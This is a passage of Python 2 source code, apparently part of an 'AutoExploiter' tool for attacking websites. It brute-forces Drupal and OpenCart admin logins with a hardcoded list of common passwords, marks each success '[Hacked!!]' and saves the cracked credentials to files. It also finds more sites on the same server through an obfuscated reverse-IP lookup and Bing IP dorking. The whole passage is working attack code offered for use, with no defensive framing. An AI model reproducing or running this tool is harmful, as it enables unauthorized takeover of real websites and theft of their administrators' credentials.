3002. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
3003. post = {}
3004. post['name'] = "admin"
3005. post['pass'] = passwd
3006. post['form_id'] = 'user_login'
3007. post['op'] = GetOP
3008. url = "http://" + site + "/?q=user/login"
3009. GoT = sess.post(url, data=post, headers=agent, timeout=10)
3010. if 'Log out' in GoT.text.encode('utf-8'):
3011. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
3012. self.r + site + ' ' + self.y + 'Drupal' + self.g + ' [Hacked!!]'
3013. with open('result/Drupal_Hacked.txt', 'a') as writer:
3014. writer.write('http://' + site + '/?q=user/login' + '\n Username: admin' + '\n Password: ' +
3015. passwd + '\n-----------------------------------------\n')
3016. self.flag = 1
3017. os._exit(1)
3018. except Exception, e:
3019. pass
3020.  
3021. class OpenCart(object):
3022. def __init__(self, site):
3023. self.flag = 0
3024. self.r = '\033[31m'
3025. self.g = '\033[32m'
3026. self.y = '\033[33m'
3027. self.b = '\033[34m'
3028. self.m = '\033[35m'
3029. self.c = '\033[36m'
3030. self.w = '\033[37m'
3031. self.rr = '\033[39m'
3032. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
3033. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
3034. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
3035. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
3036. "12", "123123"]
3037. thread = []
3038. for passwd in self.password:
3039. t = threading.Thread(target=self.opencart, args=(site, passwd))
3040. t.start()
3041. thread.append(t)
3042. time.sleep(0.02)
3043. for j in thread:
3044. j.join()
3045. if self.flag == 0:
3046. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
3047. + self.y + 'OpenCart' + self.c + ' [Not Vuln]'
3048.  
3049. def opencart(self, site, passwd):
3050. try:
3051. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
3052. post = {}
3053. post['username'] = "admin"
3054. post['password'] = passwd
3055. url = "http://" + site + "/admin/index.php"
3056. GoT = requests.post(url, data=post, headers=agent, timeout=10)
3057. if 'Logout' in GoT.text.encode('utf-8'):
3058. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
3059. self.r + site + ' ' + self.y + 'OpenCart' + self.g + ' [Hacked!!]'
3060. with open('result/OpenCart_Hacked.txt', 'a') as writer:
3061. writer.write('http://' + site + '/admin/index.php' + '\n Username: admin' + '\n Password: ' +
3062. passwd + '\n-----------------------------------------\n')
3063. self.flag = 1
3064. os._exit(1)
3065. except Exception, e:
3066. pass
3067.  
3068.  
3069.  
3070. class reverse_ipz(object):
3071. def __init__(self):
3072. self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
3073. 'Accept': '*/*'}
3074. def Reverse_ip(self, domain_Or_ipAddress):
3075.  
3076. Check = domain_Or_ipAddress
3077. if Check.startswith("http://"):
3078. Check = Check.replace("http://", "")
3079. elif Check.startswith("https://"):
3080. Check = Check.replace("https://", "")
3081. else:
3082. pass
3083. try:
3084. self.ip = socket.gethostbyname(Check)
3085. except:
3086. sys.exit()
3087. Rev = requests.get(binascii.a2b_base64('aHR0cDovL3ZpZXdkbnMuaW5mby9yZXZlcnNlaXAvP2hvc3Q9') + self.ip + '&t=1',
3088. headers=self.headers, timeout=5)
3089. Revlist = re.findall('<tr> <td>((([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}))</td>', Rev.text)
3090. if len(Revlist) == 1000:
3091. for url in Revlist:
3092. with open('logs/' + self.ip + 'x.txt', 'a') as xx:
3093. xx.write(str(url[0]) + '\n')
3094. gotoBing = BingDorker()
3095. gotoBing.ip_bing(self.ip)
3096. else:
3097. for url in Revlist:
3098. with open('logs/' + self.ip + '.txt', 'a') as xx:
3099. xx.write(str(url[0]) + '\n')
3100.  
3101.  
3102. class BingDorker(object):
3103. def ip_bing(self, __ip):
3104. try:
3105. if __ip.startswith("http://"):
3106. __ip = __ip.replace("http://", "")
3107. elif __ip.startswith("https://"):
3108. __ip = __ip.replace("https://", "")
3109. else:
3110. pass
3111. try:
3112. ip = socket.gethostbyname(__ip)
3113. except:
3114. sys.exit()
3115. next = 0
3116. while next <= 500:
3117. url = "http://www.bing.com/search?q=ip%3A" + ip + "&first=" + str(next) + "&FORM=PORE"
3118. sess = requests.session()
3119. cnn = sess.get(url, timeout=5)
3120. next = next + 10
3121. finder = re.findall(
3122. '<h2><a href="((?:https://|http://)[a-zA-Z0-9-_]+\.*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11})',
3123. cnn.text)
3124. for url in finder:
3125. if url.startswith('http://'):
3126. url = url.replace('http://', '')
3127. elif url.startswith('https://'):
3128. url = url.replace('https://', '')
3129. else:
3130. pass
3131. with open("logs/" + ip + "x.txt", 'a') as f:
3132. if 'go.microsoft.com' in url:
3133. pass
3134. else:
3135. f.write(str(url + '\n'))
3136. lines = open("logs/" + ip + "x.txt", 'r').read().splitlines()
3137. lines_set = set(lines)
3138. count = 0
3139. for line in lines_set:
3140. with open("logs/" + ip + ".txt", 'a') as xx:
3141. count = count + 1
3142. xx.write(line + '\n')
3143. os.unlink("logs/" + ip + "x.txt")
3144. except IOError:
3145. sys.exit()
3146. except IndexError:
3147. sys.exit()
3148.  
3149.  
3150. Rock = AutoExploiter()